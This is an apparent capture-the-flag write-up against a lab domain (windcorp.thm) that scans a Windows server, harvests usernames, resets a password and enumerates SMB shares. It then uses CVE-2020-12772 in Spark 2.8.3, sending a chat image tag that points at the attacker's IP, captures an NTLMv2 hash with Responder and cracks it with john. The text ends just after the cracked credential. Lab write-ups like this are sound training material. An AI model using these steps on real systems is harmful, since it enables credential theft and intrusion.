Case: Spark-WinRM
Spark|WinRM|Windows RPC|Mimikatz|Impacket|NTLM|PrivEsc
Case: Spark-WinRM
Spark|WinRM|Windows RPC|Mimikatz|Impacket|NTLM|PrivEsc
Scenario Introduction
After infiltrating SMB, we will obtain information about the system, then we will learn the NTLM hash of a user by using a vulnerability defined in Spark, and then we will connect via WinRM.
Discovery Phase
Nmap command:
$ nmap -sS -sV -T4 -A -Pn --min-rate=300 --max-retries=3 -oN nmap_result.txt -p- $target_ip
[redacted]
[redacted]
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Windcorp.
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-30 07:51:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Not valid before: 2020-04-30T14:41:03
|_Not valid after: 2020-06-30T14:41:02
| http-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
|_ Product_Version: 10.0.17763
| tls-alpn:
|_ http/1.1
|_http-title: Site doesn't have a title.
|_ssl-date: 2024-08-30T07:53:15+00:00; -1m44s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2024-08-29T07:37:21
|_Not valid after: 2025-02-28T07:37:21
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
5222/tcp open jabber
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:20+00:00; -1m43s from scanner time.
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| xmpp:
| version: 1.0
| features:
| capabilities:
| stream_id: 1dpww4atyb
| auth_mechanisms:
|_ compression_methods:
5223/tcp open ssl/jabber
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| xmpp:
| features:
| capabilities:
| compression_methods:
| errors:
| (timeout)
|_ auth_mechanisms:
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5229/tcp open jaxflow?
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| xmpp:
| version: 1.0
| features:
| capabilities:
| stream_id: w0lxxirxl
| auth_mechanisms:
|_ compression_methods:
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| xmpp:
| features:
| capabilities:
| compression_methods:
| errors:
| (timeout)
|_ auth_mechanisms:
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| xmpp:
| features:
| capabilities:
| compression_methods:
| errors:
| (timeout)
|_ auth_mechanisms:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| xmpp:
| version: 1.0
| features:
| capabilities:
| stream_id: 8x7lqxvoh3
| auth_mechanisms:
|_ compression_methods:
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| xmpp:
| features:
| capabilities:
| compression_methods:
| errors:
| (timeout)
|_ auth_mechanisms:
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:15+00:00; -1m44s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open http Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
|_http-server-header: Jetty(9.4.18.v20190429)
7443/tcp open ssl/http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_http-title: Openfire HTTP Binding Service
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Fri, 30 Aug 2024 07:51:05 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Fri, 30 Aug 2024 07:51:16 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Fri, 30 Aug 2024 07:51:31 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Fri, 30 Aug 2024 07:51:33 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 400 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
49915/tcp open msrpc Microsoft Windows RPC
We have a large structure in front of us, we have obtained a lot of port and version information. We saw different DNS definitions according to RDP NTLM information.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
You should register these in your local DNS.
$ nano /etc/hosts
10.10.187.82 windcorp.thm fire.windcorp.thm
Let’s send a query to these points.
$ curl -iLX GET http://fire.windcorp.thm
[redacted]
[redacted]
<script>
function reset() {
window.open("http://fire.windcorp.thm/reset.asp", "_blank", "toolbar=no,scrollbars=no,resizable=no,top=500,left=500,width=925,height=300");
[redacted]
[redacted]
<div class="col-xl-9 mx-auto">
<h1 class="mb-5">Welcome to our company portal!</h1>
</div>
[redacted]
[redacted]
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicfish718@fire.windcorp.thm"> <a href="xmpp:organicfish718@fire.windcorp.thm">Antonietta Vidal</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicwolf509@fire.windcorp.thm"> <a href="xmpp:organicwolf509@fire.windcorp.thm">Britney Palmer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinywolf424@fire.windcorp.thm"> <a href="xmpp:tinywolf424@fire.windcorp.thm">Brittany Cruz</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=angrybird253@fire.windcorp.thm"> <a href="xmpp:angrybird253@fire.windcorp.thm">Carla Meyer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=buse@fire.windcorp.thm"> <a href="xmpp:buse@fire.windcorp.thm">Buse Candan</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edeltraut@fire.windcorp.thm"><a href="xmpp:Edeltraut@fire.windcorp.thm"> Edeltraut Daub</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edward@fire.windcorp.thm"><a href="xmpp:Edward@fire.windcorp.thm"> Edward Lewis</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Emile@fire.windcorp.thm"><a href="xmpp:Emile@fire.windcorp.thm"> Emile Lavoie</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinygoose102@fire.windcorp.thm"><a href="xmpp:tinygoose102@fire.windcorp.thm"> Emile Henry</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=brownostrich284@fire.windcorp.thm"><a href="xmpp:brownostrich284@fire.windcorp.thm"> Emily Anderson</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=sadswan869@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Hemmo Boschma</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=goldencat416@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Isabella Hughes</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=whiteleopard529@fire.windcorp.thm"><a href="xmpp:whiteleopard529@fire.windcorp.thm"> Isra Saur</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=happymeercat399@fire.windcorp.thm"><a href="xmpp:happymeercat399@fire.windcorp.thm"> Jackson Vasquez</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=orangegorilla428@fire.windcorp.thm"><a href="xmpp:orangegorilla428@fire.windcorp.thm"> Jaqueline Dittmer</a></li>
[redacted]
[redacted]
<div class="testimonial-item mx-auto mb-5 mb-lg-0">
<img class="img-fluid rounded-circle mb-3" src="img/Emilieje.jpg" alt="">
<h5>Emily Jensen</h5>
<p class="font-weight-light mb-0">"Love it! Thanks for beleiving in me!"</p>
</div>
</div>
<div class="col-lg-4">
<div class="testimonial-item mx-auto mb-5 mb-lg-0">
<img class="img-fluid rounded-circle mb-3" src="img/lilyleAndSparky.jpg" alt="">
<h5>Lily Levesque</h5>
<p class="font-weight-light mb-0">"I love being able to bring my best friend to work with me!"</p>
</div>
</div>
<div class="col-lg-4">
<div class="testimonial-item mx-auto mb-5 mb-lg-0">
<img class="img-fluid rounded-circle mb-3" src="img/kirkug.jpg" alt="">
<h5>Kirk Uglas</h5>
<p class="font-weight-light mb-0">"Every day is a treat!"</p>
</div>
[redacted]
[redacted]

output
We have received valuable information defined on the site, the first striking detail is the potential user emails.
organicfish718@fire.windcorp.thm
organicwolf509@fire.windcorp.thm
tinywolf424@fire.windcorp.thm
angrybird253@fire.windcorp.thm
buse@fire.windcorp.thm
Edeltraut@fire.windcorp.thm
Edward@fire.windcorp.thm
Emile@fire.windcorp.thm
tinygoose102@fire.windcorp.thm
brownostrich284@fire.windcorp.thm
sadswan869@fire.windcorp.thm
goldencat416@fire.windcorp.thm
whiteleopard529@fire.windcorp.thm
happymeercat399@fire.windcorp.thm
orangegorilla428@fire.windcorp.thm
We can also generate usernames from these.
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
edeltraut
Edward
edward
Emile
emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428
You should record these.
There are also some images, these provide you with details about the employees.

output
We have seen the existence of an endpoint about password reset:
http://fire.windcorp.thm/reset.asp

output
Password Reset & Basic OSINT
Now we can try to change a user’s password. We learned the name of a user and the name of the dog in the image on an image defined on the site.

output

output
Yes, the password has been reset successfully, now we have a credential.
lilyle : ChangeMe#1234
Obtaining SMB Shares and System Information
We discovered that SMB is on. We can try to establish a connection through that.
$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234' --shares --pass-pol
SMB windcorp.thm 445 FIRE [*] Windows 10 / Server 2019 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB windcorp.thm 445 FIRE [+] windcorp.thm\lilyle:ChangeMe#1234
[redacted]
[redacted]
SMB windcorp.thm 445 FIRE Share Permissions Remark
SMB windcorp.thm 445 FIRE ----- ----------- ------
SMB windcorp.thm 445 FIRE ADMIN$ Remote Admin
SMB windcorp.thm 445 FIRE C$ Default share
SMB windcorp.thm 445 FIRE IPC$ READ Remote IPC
SMB windcorp.thm 445 FIRE NETLOGON READ Logon server share
SMB windcorp.thm 445 FIRE Shared READ
SMB windcorp.thm 445 FIRE SYSVOL READ Logon server share
SMB windcorp.thm 445 FIRE Users READ
SMB windcorp.thm 445 FIRE [+] Dumping password info for domain: WINDCORP
SMB windcorp.thm 445 FIRE Minimum password length: 7
SMB windcorp.thm 445 FIRE Password history length: 24
SMB windcorp.thm 445 FIRE Maximum password age: 41 days 23 hours 53 minutes
SMB windcorp.thm 445 FIRE
SMB windcorp.thm 445 FIRE Password Complexity Flags: 010001
SMB windcorp.thm 445 FIRE Domain Refuse Password Change: 0
SMB windcorp.thm 445 FIRE Domain Password Store Cleartext: 1
SMB windcorp.thm 445 FIRE Domain Password Lockout Admins: 0
SMB windcorp.thm 445 FIRE Domain Password No Clear Change: 0
SMB windcorp.thm 445 FIRE Domain Password No Anon Change: 0
SMB windcorp.thm 445 FIRE Domain Password Complex: 1
SMB windcorp.thm 445 FIRE
SMB windcorp.thm 445 FIRE Minimum password age: 1 day 4 minutes
SMB windcorp.thm 445 FIRE Reset Account Lockout Counter: 2 minutes
SMB windcorp.thm 445 FIRE Locked Account Duration: 2 minutes
SMB windcorp.thm 445 FIRE Account Lockout Threshold: 5
SMB windcorp.thm 445 FIRE Forced Log off Time: Not Set
We got shares:
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
IPC$ READ Remote IPC
NETLOGON READ Logon server share
Shared READ
SYSVOL READ Logon server share
Users READ
According to the password policy there is a lockout threshold of 5 which means if we provide the wrong password 5 times for a user, then we would end up locking out that account for the Locked Account Duration which is 2 minutes in this case.
Now we can look at the contents of the shares recursively.
$ smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm -r
[+] IP: 10.10.187.82:445 Name: windcorp.thm Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
./IPC$
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 5 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-250-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-2bc-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5c8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-768-0
fr--r--r-- 5 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-348-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-348-1
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 RpcProxy\49674
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 63b9cfeb0aeafc69
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 RpcProxy\593
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-9ac-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 netdfs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ROUTER
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-334-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.133694770150844361.4064.DefaultAppDomain.powershell
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-cc0-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 TermSrv_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 Ctx_WinStation_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 SessEnvPublicRpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1708-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.133694771381775684.7116.DefaultAppDomain.powershell
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.133694770137980086.3532.DefaultAppDomain.sme
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-cac-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 iisipm4309e33a-9494-4553-bf48-cc7f6ca4e72b
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 iislogpipe4f9fd9d3-af99-42ff-af51-f14b237070e1
NETLOGON READ ONLY Logon server share
./NETLOGON
dr--r--r-- 0 Sat May 2 06:02:19 2020 .
dr--r--r-- 0 Sat May 2 06:02:19 2020 ..
Shared READ ONLY
./Shared
dr--r--r-- 0 Fri May 29 20:45:42 2020 .
dr--r--r-- 0 Fri May 29 20:45:42 2020 ..
fr--r--r-- 45 Fri May 1 11:32:36 2020 Flag 1.txt
fr--r--r-- 29526628 Fri May 29 20:45:01 2020 spark_2_8_3.deb
fr--r--r-- 99555201 Sun May 3 07:08:39 2020 spark_2_8_3.dmg
fr--r--r-- 78765568 Sun May 3 07:08:39 2020 spark_2_8_3.exe
fr--r--r-- 123216290 Sun May 3 07:08:39 2020 spark_2_8_3.tar.gz
SYSVOL READ ONLY Logon server share
./SYSVOL
dr--r--r-- 0 Sat May 2 06:02:20 2020 .
dr--r--r-- 0 Sat May 2 06:02:20 2020 ..
dr--r--r-- 0 Sat May 2 06:02:20 2020 NRznLVEcPj
dr--r--r-- 0 Thu Apr 30 11:11:10 2020 windcorp.thm
Users READ ONLY
./Users
dw--w--w-- 0 Sat May 2 18:05:58 2020 .
dw--w--w-- 0 Sat May 2 18:05:58 2020 ..
dr--r--r-- 0 Sun May 10 07:18:11 2020 Administrator
dr--r--r-- 0 Thu Apr 30 20:33:55 2020 All Users
dr--r--r-- 0 Fri May 1 09:09:44 2020 angrybird
dr--r--r-- 0 Fri May 1 09:09:34 2020 berg
dr--r--r-- 0 Fri May 1 09:09:22 2020 bluefrog579
dr--r--r-- 0 Sun May 3 09:30:02 2020 brittanycr
dr--r--r-- 0 Fri May 1 09:09:08 2020 brownostrich284
dr--r--r-- 0 Fri Aug 30 03:38:51 2024 buse
dw--w--w-- 0 Thu Apr 30 19:35:11 2020 Default
dr--r--r-- 0 Thu Apr 30 20:33:55 2020 Default User
fr--r--r-- 174 Thu Apr 30 20:31:55 2020 desktop.ini
dr--r--r-- 0 Fri May 1 09:08:54 2020 edward
dr--r--r-- 0 Sat May 2 19:30:16 2020 freddy
dr--r--r-- 0 Fri May 1 09:08:28 2020 garys
dr--r--r-- 0 Fri Aug 30 04:21:06 2024 goldencat416
dr--r--r-- 0 Fri May 1 09:08:17 2020 goldenwol
dr--r--r-- 0 Fri May 1 09:08:06 2020 happ
dr--r--r-- 0 Fri May 1 09:07:53 2020 happyme
dr--r--r-- 0 Fri May 1 09:07:42 2020 Luis
dr--r--r-- 0 Fri May 1 09:07:31 2020 orga
dr--r--r-- 0 Fri May 1 09:07:19 2020 organicf
dr--r--r-- 0 Fri Aug 30 04:21:59 2024 organicfish718
dr--r--r-- 0 Fri May 1 09:07:06 2020 pete
dw--w--w-- 0 Thu Apr 30 10:35:47 2020 Public
dr--r--r-- 0 Fri May 1 09:06:54 2020 purplecat
dr--r--r-- 0 Fri May 1 09:06:42 2020 purplepanda
dr--r--r-- 0 Fri May 1 09:06:31 2020 sadswan
dr--r--r-- 0 Fri Aug 30 04:17:23 2024 sadswan869
dr--r--r-- 0 Fri May 1 09:06:20 2020 sheela
dr--r--r-- 0 Fri May 1 09:05:39 2020 silver
dr--r--r-- 0 Fri May 1 09:05:24 2020 smallf
dr--r--r-- 0 Fri May 1 09:05:05 2020 spiff
dr--r--r-- 0 Fri May 1 09:04:49 2020 tinygoos
dr--r--r-- 0 Fri May 1 09:03:57 2020 whiteleopard
We found the actual user definitions. Save these names.
angrybird
berg
bluefrog579
brittanycr
brownostrich284
buse
edward
freddy
garys
goldencat416
goldenwol
happ
happyme
Luis
orga
organicf
organicfish718
pete
purplecat
purplepanda
sadswan
sadswan869
sheela
silver
smallf
spiff
tinygoos
whiteleopard
We also obtained information about Spark. Its version is 2.8.3.
spark_2_8_3.deb
spark_2_8_3.dmg
spark_2_8_3.exe
spark_2_8_3.tar.gz
We can log in as the lilyle user with another command.
$ smbclient \\\\windcorp.thm\\Shared -U Windcorp.thm\\lilyle
Password for [WINDCORP.THM\lilyle]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri May 29 20:45:42 2020
.. D 0 Fri May 29 20:45:42 2020
Flag 1.txt A 45 Fri May 1 11:32:36 2020
spark_2_8_3.deb A 29526628 Fri May 29 20:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 07:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 07:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 07:07:24 2020
15587583 blocks of size 4096. 10908389 blocks available
smb: \>
Spark Vulnerability & Exploitation Phase
We noticed that Spark version 2.8.3 was installed. This allows us to conduct an exploit investigation on this version. We may conduct research on the Internet.
We also have CVE ID now: CVE-2020-12772.
When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image.
<img src=[external_ip]/test.img>
Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user we are chatting with.
Now we need to test this on the required version. You can obtain the installation file by transferring the .deb file on SMB to your local. Or you can use the resources below.
smb: \> get spark_2_8_3.deb
getting file \spark_2_8_3.deb of size 29526628 as spark_2_8_3.deb (1242.5 KiloBytes/sec) (average 1242.5 KiloBytes/sec)
You can start the installation with the following command.
$ dpkg -i spark_2_8_3.deb
For correct installation openjdk-8-jre and oracle-java8-jre must be on your system. Check this source: https://itadminsbraindump.wordpress.com/2017/08/04/how-to-install-spark-2-8-3-im-for-openfire-in-ubuntu-or-lubuntu-17-04-any-version/
After installation, you need to log in.

output

output
You need to explore the app a bit, then start a chat.
Actions -> Start a Chat -> Buse

output
You must activate Responder.
$ responder -I tun0 -i 10.2.37.37
Just send a message with our payload.
<img src=”http://10.2.37.37/anyimage.jpg">
Then you get the NTLM hash.
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000
00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C
004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000
33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000
00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000
0000000000000000000000000000090000000000000000000000
[*] Skipping previously captured hash for WINDCORP\buse
Hash is here:
buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD00000000020006005300
4D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C00030028007300650072007600650072003200300
0300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE
5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000
NTLM Hash Cracking Phase
We need to crack this, so we’re going to use the john tool.
$ echo 'buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000' > busehash
Use john tool.
$ sudo john busehash --wordlist=/usr/share/wordlists/rockyou.txt
Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131 (buse)
Now we have a credential.
buse : uzunLM+3131
We can use another tool. First, learn the hash type.
